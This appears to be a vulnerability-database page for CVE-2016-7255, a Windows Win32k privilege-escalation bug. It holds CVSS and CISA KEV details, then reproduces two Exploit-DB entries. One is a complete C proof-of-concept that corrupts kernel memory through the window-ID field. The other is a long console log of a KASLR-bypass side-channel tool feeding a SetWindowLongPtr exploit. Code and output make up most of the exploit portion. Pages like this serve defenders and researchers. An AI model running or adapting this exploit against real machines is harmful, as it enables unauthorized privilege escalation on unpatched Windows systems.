CVE-2016-7255 : Detail

CVE-2016-7255

CVSS score: 7.8 / High (V3)
EPSS: 4.43%
Attack vector: Local
Published: 2016-11-10 06h16 +00:00
Updated: 2025-02-10 16h41 +00:00

CVE Description

The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."

CVE Information

Related Weaknesses

CWE-ID: CWE-Other
Weakness Name: No information
Source: (none listed)

Metrics

Metrics | Score | Severity | CVSS Vector
V3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitability Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which the vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

Source (V3.1 row above): [email protected]

Metrics | Score | CVSS Vector | Source
V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected]

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Microsoft Win32k Privilege Escalation Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Unknown

Added : 2021-11-02 23h00 +00:00

Action is due : 2022-05-02 22h00 +00:00

Important information
This CVE is listed in the CISA Catalog of Known Exploited Vulnerabilities (KEV) and poses an active threat. CISA lists this vulnerability as actively exploited by cybercriminals, which makes immediate action to address this flaw important. Prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 40745

Publication date : 2016-11-08 23h00 +00:00
Author : TinySec
EDB Verified : No

/*
Source: https://github.com/tinysec/public/tree/master/CVE-2016-7255

Full Proof of Concept:
https://github.com/tinysec/public/tree/master/CVE-2016-7255
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40745.zip

********************************************************************
    Created:    2016-11-09 14:23:09
    Filename:   main.c
    Author:     root[at]TinySec.net
    Version     0.0.0.1
    Purpose:    poc of cve-2016-0075
*********************************************************************
*/

#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>

//////////////////////////////////////////////////////////////////////////

#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")

#undef DbgPrint

ULONG __cdecl DbgPrintEx(
    IN ULONG ComponentId,
    IN ULONG Level,
    IN PCCH Format,
    IN ...
);

// Formats a message and sends it both to the kernel debugger (DbgPrintEx)
// and to the user-mode debugger output (OutputDebugStringA).
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
    CHAR*   pszDbgBuff = NULL;
    va_list VaList = NULL;
    ULONG   ulRet = 0;

    do
    {
        pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));
        if (NULL == pszDbgBuff)
        {
            break;
        }
        RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));

        va_start(VaList, Format);
        _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);

        DbgPrintEx(77, 0, pszDbgBuff);
        OutputDebugStringA(pszDbgBuff);

        va_end(VaList);

    } while (FALSE);

    if (NULL != pszDbgBuff)
    {
        HeapFree(GetProcessHeap(), 0, pszDbgBuff);
        pszDbgBuff = NULL;
    }

    return ulRet;
}

// Synthesizes a key-down event for the given virtual-key code.
int _sim_key_down(WORD wKey)
{
    INPUT stInput = {0};

    do
    {
        stInput.type = INPUT_KEYBOARD;
        stInput.ki.wVk = wKey;
        stInput.ki.dwFlags = 0;

        SendInput(1, &stInput, sizeof(stInput));

    } while (FALSE);

    return 0;
}

// Synthesizes a key-up event for the given virtual-key code.
int _sim_key_up(WORD wKey)
{
    INPUT stInput = {0};

    do
    {
        stInput.type = INPUT_KEYBOARD;
        stInput.ki.wVk = wKey;
        stInput.ki.dwFlags = KEYEVENTF_KEYUP;

        SendInput(1, &stInput, sizeof(stInput));

    } while (FALSE);

    return 0;
}

// Simulates the Alt+Shift+Esc key combination (Esc is pressed twice).
int _sim_alt_shift_esc()
{
    int i = 0;

    do
    {
        _sim_key_down(VK_MENU);
        _sim_key_down(VK_SHIFT);

        _sim_key_down(VK_ESCAPE);
        _sim_key_up(VK_ESCAPE);

        _sim_key_down(VK_ESCAPE);
        _sim_key_up(VK_ESCAPE);

        _sim_key_up(VK_MENU);
        _sim_key_up(VK_SHIFT);

    } while (FALSE);

    return 0;
}

// Simulates Alt+Shift held down while Tab is pressed nCount times,
// pausing one second between presses.
int _sim_alt_shift_tab(int nCount)
{
    int  i = 0;
    HWND hWnd = NULL;
    int  nFinalRet = -1;

    do
    {
        _sim_key_down(VK_MENU);
        _sim_key_down(VK_SHIFT);

        for (i = 0; i < nCount; i++)
        {
            _sim_key_down(VK_TAB);
            _sim_key_up(VK_TAB);

            Sleep(1000);
        }

        _sim_key_up(VK_MENU);
        _sim_key_up(VK_SHIFT);

    } while (FALSE);

    return nFinalRet;
}

int or_address_value_4(__in void* pAddress)
{
    WNDCLASSEXW stWC = {0};
    HWND        hWndParent = NULL;
    HWND        hWndChild = NULL;
    WCHAR*      pszClassName = L"cve-2016-7255";
    WCHAR*      pszTitleName = L"cve-2016-7255";
    void*       pId = NULL;
    MSG         stMsg = {0};

    do
    {
        stWC.cbSize = sizeof(stWC);
        stWC.lpfnWndProc = DefWindowProcW;
        stWC.lpszClassName = pszClassName;

        if (0 == RegisterClassExW(&stWC))
        {
            break;
        }

        hWndParent = CreateWindowExW(
            0,
            pszClassName,
            NULL,
            WS_OVERLAPPEDWINDOW | WS_VISIBLE,
            0,
            0,
            360,
            360,
            NULL,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );
        if (NULL == hWndParent)
        {
            break;
        }

        hWndChild = CreateWindowExW(
            0,
            pszClassName,
            pszTitleName,
            WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
            0,
            0,
            160,
            160,
            hWndParent,
            NULL,
            GetModuleHandleW(NULL),
            NULL
        );
        if (NULL == hWndChild)
        {
            break;
        }

#ifdef _WIN64
        pId = ((UCHAR*)pAddress - 0x28);
#else
        pId = ((UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64

        SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);

        DbgPrint("hWndChild = 0x%p\n", hWndChild);

        DebugBreak();

        ShowWindow(hWndParent, SW_SHOWNORMAL);

        SetParent(hWndChild, GetDesktopWindow());

        SetForegroundWindow(hWndChild);

        _sim_alt_shift_tab(4);

        SwitchToThisWindow(hWndChild, TRUE);

        _sim_alt_shift_esc();

        while (GetMessage(&stMsg, NULL, 0, 0))
        {
            TranslateMessage(&stMsg);
            DispatchMessage(&stMsg);
        }

    } while (FALSE);

    if (NULL != hWndParent)
    {
        DestroyWindow(hWndParent);
        hWndParent = NULL;
    }

    if (NULL != hWndChild)
    {
        DestroyWindow(hWndChild);
        hWndChild = NULL;
    }

    UnregisterClassW(pszClassName, GetModuleHandleW(NULL));

    return 0;
}

int __cdecl wmain(int nArgc, WCHAR** Argv)
{
    do
    {
        or_address_value_4((void*)0xFFFFFFFF);

    } while (FALSE);

    return 0;
}
Exploit Database EDB-ID : 40823

Publication date : 2016-11-23 23h00 +00:00
Author : IOactive
EDB Verified : No

Complete Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40823.zip Presentation: https://www.exploit-db.com/docs/english/40822-i-know-where-your-page-lives---de-randomizing-the-latest-windows-10-kernel.pdf I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016 Requirements Intel Processor (Haswell or newer) Windows 10 x64 Usage Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry: C:\Users\qa\Desktop>ASLRSideChannelAttack.exe +] Setting thread affinity to CPU 0 +] Getting all the potential PML4 SelfRef +] Mapping a page oracle +] Allocating probing target pages... Allocation 0: 0000020E339D0000 Allocation 1: 0000020E339E0000 Allocation 2: 0000020E339F0000 Allocation 3: 0000020E33A00000 Allocation 4: 0000020E33A10000 -------------------------- +] Check that Unammped and Mapped values are consistent across several executions! -------------------------- Unmapped Initial: 256.683746 Mapped Initial: 203.692978 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.440018 Mapped: 202.827560 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213 +] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563 +] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382 +] PTE FFFF81010719D000 looks mapped! - Time: 197.297256 +] PTE FFFF81010719D080 looks mapped! - Time: 194.501175 +] PTE FFFF810804020100 looks mapped! - Time: 204.740097 +] Removing 102 from initial array and pushing it into final array Potential SelfRef: FFFF81C0E0703818 +] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616 +] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774 +] PTE FFFF81810719CF80 looks mapped! 
- Time: 208.949921 +] PTE FFFF81810719D000 looks mapped! - Time: 202.525726 +] PTE FFFF81810719D080 looks mapped! - Time: 208.673874 Time difference exceed for ffff818804020100, retrying... +] PTE FFFF818804020100 looks mapped! - Time: 209.071213 +] Removing 103 from initial array and pushing it into final array Time difference exceed for ffff824120904820, retrying... Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642 Time difference exceed for ffff82010719cf00, retrying... +] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593 +] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344 +] PTE FFFF82010719D000 looks mapped! - Time: 207.820862 +] PTE FFFF82010719D080 looks mapped! - Time: 197.229263 +] PTE FFFF820804020100 looks mapped! - Time: 204.585739 +] Removing 104 from initial array and pushing it into final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003 Time difference exceed for ffff8341a0d06830, retrying... Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657 +] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697 +] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016 +] PTE FFFF83010719D000 looks mapped! - Time: 214.013504 +] PTE FFFF83010719D080 looks mapped! - Time: 191.688126 +] PTE FFFF830804020100 looks mapped! - Time: 193.314758 +] Removing 106 from initial array and pushing it into final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973 +] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693 +] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097 +] PTE FFFF83810719D000 looks mapped! - Time: 216.298660 +] PTE FFFF83810719D080 looks mapped! - Time: 203.848816 +] PTE FFFF838804020100 looks mapped! - Time: 204.008743 +] Removing 107 from initial array and pushing it into final array Time difference exceed for ffff89c4e2713898, retrying... 
Time difference exceed for ffff8bc5e2f178b8, retrying... Time difference exceed for ffff8c46231188c0, retrying... Unmapped Initial: 248.508636 Mapped Initial: 207.139847 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 236.360733 Mapped: 195.650040 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363 Potential SelfRef: FFFF81C0E0703818 Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... Time difference exceed for ffff81810719ce80, retrying... +] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393 Time difference exceed for ffff81810719cf00, retrying... +] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645 +] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724 +] PTE FFFF81810719D000 looks mapped! - Time: 197.655167 +] PTE FFFF81810719D080 looks mapped! - Time: 201.667160 +] PTE FFFF818804020100 looks mapped! - Time: 195.728439 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF81C0E0703818 - Index: 103 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff818000000000 -] Erasing 103 from final array Potential SelfRef: FFFF824120904820 +] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759 +] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019 +] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364 +] PTE FFFF82010719D000 looks mapped! - Time: 203.052826 +] PTE FFFF82010719D080 looks mapped! - Time: 194.115143 +] PTE FFFF820804020100 looks mapped! 
- Time: 198.158585 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF824120904820 - Index: 104 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff820000000000 -] Erasing 104 from final array Potential SelfRef: FFFF8341A0D06830 +] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823 +] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525 +] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040 +] PTE FFFF83010719D000 looks mapped! - Time: 196.066254 +] PTE FFFF83010719D080 looks mapped! - Time: 189.007034 +] PTE FFFF830804020100 looks mapped! - Time: 197.613953 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF8341A0D06830 - Index: 106 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff830000000000 -] Erasing 106 from final array Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380 Time difference exceed for ffff83810719cf00, retrying... Time difference exceed for ffff83810719cf00, retrying... Unmapped Initial: 232.123840 Mapped Initial: 196.420654 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 234.845581 Mapped: 187.862518 -------------------------- Potential SelfRef: FFFF8140A0502810 +] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938 +] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766 Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... Time difference exceed for ffff81010719cf80, retrying... +] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784 +] PTE FFFF81010719D000 looks mapped! - Time: 194.332733 +] PTE FFFF81010719D080 looks mapped! - Time: 200.211182 +] PTE FFFF810804020100 looks mapped! 
- Time: 199.812225 PML4e: FFFF8140A0502810 - Index: 102 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff810000000000 Time difference exceed for ffff810000000000, retrying... -] Erasing 102 from final array Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 230.247162 Mapped Initial: 198.023987 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 235.923035 Mapped: 191.605301 -------------------------- Time difference exceed for ffff83c1e0f07838, retrying... Time difference exceed for ffff83c1e0f07838, retrying... Potential SelfRef: FFFF83C1E0F07838 Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Time difference exceed for ffff83810719ce80, retrying... Unmapped Initial: 258.041046 Mapped Initial: 210.309753 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 238.757538 Mapped: 203.896240 -------------------------- Potential SelfRef: FFFF83C1E0F07838 +] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102 +] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836 +] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333 +] PTE FFFF83810719D000 looks mapped! - Time: 197.218445 +] PTE FFFF83810719D080 looks mapped! - Time: 203.334763 +] PTE FFFF838804020100 looks mapped! 
- Time: 203.243607 PML4e: FFFF83C1E0F07838 - Index: 107 KNOWN_UNMAPPED PTE: ffff838000000000 -] Erasing 107 from final array Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221 +] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138 +] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006 +] PTE FFFF82810719D000 looks mapped! - Time: 209.909943 +] PTE FFFF82810719D080 looks mapped! - Time: 202.795639 +] PTE FFFF828804020100 looks mapped! - Time: 196.754044 +] Removing 105 from initial array and pushing it into final array Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff884422110880, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff8ec763b1d8e8, retrying... Time difference exceed for ffff90c864321908, retrying... Unmapped Initial: 257.754272 Mapped Initial: 207.903702 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... -------------------------- Unmapped: 247.145935 Mapped: 207.792923 -------------------------- Potential SelfRef: FFFF82C160B05828 +] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092 +] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715 +] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614 +] PTE FFFF82810719D000 looks mapped! - Time: 213.698837 +] PTE FFFF82810719D080 looks mapped! - Time: 210.162796 +] PTE FFFF828804020100 looks mapped! 
- Time: 208.765045 PML4e: FFFF82C160B05828 - Index: 105 KNOWN_UNMAPPED PTE: ffff828000000000 -] Erasing 105 from final array -] Removing 100 as it seems to be unmapped -] Removing 101 as it seems to be unmapped -] Removing 108 as it seems to be unmapped -] Removing 109 as it seems to be unmapped -] Removing 10a as it seems to be unmapped -] Removing 10b as it seems to be unmapped -] Removing 10c as it seems to be unmapped -] Removing 10d as it seems to be unmapped Time difference exceed for ffff8743a1d0e870, retrying... -] Removing 10e as it seems to be unmapped -] Removing 10f as it seems to be unmapped -] Removing 110 as it seems to be unmapped Time difference exceed for ffff88c462311888, retrying... -] Removing 111 as it seems to be unmapped -] Removing 112 as it seems to be unmapped -] Removing 113 as it seems to be unmapped Time difference exceed for ffff8a45229148a0, retrying... -] Removing 114 as it seems to be unmapped -] Removing 115 as it seems to be unmapped -] Removing 116 as it seems to be unmapped -] Removing 117 as it seems to be unmapped Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffbc5e2f178bc0, retrying... Time difference exceed for ffffe8f47a3d1e88, retrying... Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379 +] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694 +] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502 +] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920 +] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059 +] PTE FFFFF60804020100 looks mapped! - Time: 211.636246 +] Removing 1ec from initial array and pushing it into final array Unmapped Initial: 233.678802 Mapped Initial: 214.496124 -------------------------- +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... +] Measures are not consistent yet... 
-------------------------- Unmapped: 250.585373 Mapped: 213.339661 -------------------------- Potential SelfRef: FFFFF67B3D9ECF60 +] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174 +] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457 +] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861 +] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334 +] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160 +] PTE FFFFF60804020100 looks mapped! - Time: 204.036926 PML4e: FFFFF67B3D9ECF60 - Index: 1ec KNOWN_UNMAPPED PTE: fffff60000000000 Real PML4 SelfRef Found: fffff67b3d9ecf60 Left in Potential Array: ffff8c46231188c0 Left in Potential Array: ffff8cc6633198c8 Left in Potential Array: ffff8d46a351a8d0 Left in Potential Array: ffff8dc6e371b8d8 Left in Potential Array: ffff8e472391c8e0 Left in Potential Array: ffff8ec763b1d8e8 Left in Potential Array: ffff8f47a3d1e8f0 Left in Potential Array: ffff8fc7e3f1f8f8 Left in Potential Array: ffff904824120900 Left in Potential Array: ffff90c864321908 Left in Potential Array: ffff9148a4522910 Left in Potential Array: ffff91c8e4723918 Left in Potential Array: ffff924924924920 Left in Potential Array: ffff92c964b25928 Left in Potential Array: ffff9349a4d26930 Left in Potential Array: ffff93c9e4f27938 Left in Potential Array: ffff944a25128940 Left in Potential Array: ffff94ca65329948 Left in Potential Array: ffff954aa552a950 Left in Potential Array: ffff95cae572b958 Left in Potential Array: ffff964b2592c960 Left in Potential Array: ffff96cb65b2d968 Left in Potential Array: ffff974ba5d2e970 Left in Potential Array: ffff97cbe5f2f978 Left in Potential Array: ffff984c26130980 Left in Potential Array: ffff98cc66331988 Left in Potential Array: ffff994ca6532990 Left in Potential Array: ffff99cce6733998 Left in Potential Array: ffff9a4d269349a0 Left in Potential Array: ffff9acd66b359a8 Left in Potential Array: ffff9b4da6d369b0 Left in Potential Array: ffff9bcde6f379b8 Left in Potential Array: ffff9c4e271389c0 Left in Potential Array: 
ffff9cce673399c8 Left in Potential Array: ffff9d4ea753a9d0 Left in Potential Array: ffff9dcee773b9d8 Left in Potential Array: ffff9e4f2793c9e0 Left in Potential Array: ffff9ecf67b3d9e8 Left in Potential Array: ffff9f4fa7d3e9f0 Left in Potential Array: ffff9fcfe7f3f9f8 Left in Potential Array: ffffa05028140a00 Left in Potential Array: ffffa0d068341a08 Left in Potential Array: ffffa150a8542a10 Left in Potential Array: ffffa1d0e8743a18 Left in Potential Array: ffffa25128944a20 Left in Potential Array: ffffa2d168b45a28 Left in Potential Array: ffffa351a8d46a30 Left in Potential Array: ffffa3d1e8f47a38 Left in Potential Array: ffffa45229148a40 Left in Potential Array: ffffa4d269349a48 Left in Potential Array: ffffa552a954aa50 Left in Potential Array: ffffa5d2e974ba58 Left in Potential Array: ffffa6532994ca60 Left in Potential Array: ffffa6d369b4da68 Left in Potential Array: ffffa753a9d4ea70 Left in Potential Array: ffffa7d3e9f4fa78 Left in Potential Array: ffffa8542a150a80 Left in Potential Array: ffffa8d46a351a88 Left in Potential Array: ffffa954aa552a90 Left in Potential Array: ffffa9d4ea753a98 Left in Potential Array: ffffaa552a954aa0 Left in Potential Array: ffffaad56ab55aa8 Left in Potential Array: ffffab55aad56ab0 Left in Potential Array: ffffabd5eaf57ab8 Left in Potential Array: ffffac562b158ac0 Left in Potential Array: ffffacd66b359ac8 Left in Potential Array: ffffad56ab55aad0 Left in Potential Array: ffffadd6eb75bad8 Left in Potential Array: ffffae572b95cae0 Left in Potential Array: ffffaed76bb5dae8 Left in Potential Array: ffffaf57abd5eaf0 Left in Potential Array: ffffafd7ebf5faf8 Left in Potential Array: ffffb0582c160b00 Left in Potential Array: ffffb0d86c361b08 Left in Potential Array: ffffb158ac562b10 Left in Potential Array: ffffb1d8ec763b18 Left in Potential Array: ffffb2592c964b20 Left in Potential Array: ffffb2d96cb65b28 Left in Potential Array: ffffb359acd66b30 Left in Potential Array: ffffb3d9ecf67b38 Left in Potential Array: ffffb45a2d168b40 Left in 
Potential Array: ffffb4da6d369b48 Left in Potential Array: ffffb55aad56ab50 Left in Potential Array: ffffb5daed76bb58 Left in Potential Array: ffffb65b2d96cb60 Left in Potential Array: ffffb6db6db6db68 Left in Potential Array: ffffb75badd6eb70 Left in Potential Array: ffffb7dbedf6fb78 Left in Potential Array: ffffb85c2e170b80 Left in Potential Array: ffffb8dc6e371b88 Left in Potential Array: ffffb95cae572b90 Left in Potential Array: ffffb9dcee773b98 Left in Potential Array: ffffba5d2e974ba0 Left in Potential Array: ffffbadd6eb75ba8 Left in Potential Array: ffffbb5daed76bb0 Left in Potential Array: ffffbbddeef77bb8 Left in Potential Array: ffffbc5e2f178bc0 Left in Potential Array: ffffbcde6f379bc8 Left in Potential Array: ffffbd5eaf57abd0 Left in Potential Array: ffffbddeef77bbd8 Left in Potential Array: ffffbe5f2f97cbe0 Left in Potential Array: ffffbedf6fb7dbe8 Left in Potential Array: ffffbf5fafd7ebf0 Left in Potential Array: ffffbfdfeff7fbf8 Left in Potential Array: ffffc06030180c00 Left in Potential Array: ffffc0e070381c08 Left in Potential Array: ffffc160b0582c10 Left in Potential Array: ffffc1e0f0783c18 Left in Potential Array: ffffc26130984c20 Left in Potential Array: ffffc2e170b85c28 Left in Potential Array: ffffc361b0d86c30 Left in Potential Array: ffffc3e1f0f87c38 Left in Potential Array: ffffc46231188c40 Left in Potential Array: ffffc4e271389c48 Left in Potential Array: ffffc562b158ac50 Left in Potential Array: ffffc5e2f178bc58 Left in Potential Array: ffffc6633198cc60 Left in Potential Array: ffffc6e371b8dc68 Left in Potential Array: ffffc763b1d8ec70 Left in Potential Array: ffffc7e3f1f8fc78 Left in Potential Array: ffffc86432190c80 Left in Potential Array: ffffc8e472391c88 Left in Potential Array: ffffc964b2592c90 Left in Potential Array: ffffc9e4f2793c98 Left in Potential Array: ffffca6532994ca0 Left in Potential Array: ffffcae572b95ca8 Left in Potential Array: ffffcb65b2d96cb0 Left in Potential Array: ffffcbe5f2f97cb8 Left in Potential Array: 
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60

Run SetWindowLongPtr_Exploit.exe

C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...
Value Self Ref = 8000000100211867
[+] Selected spurious PML4E: fffff67b3d9ecf00
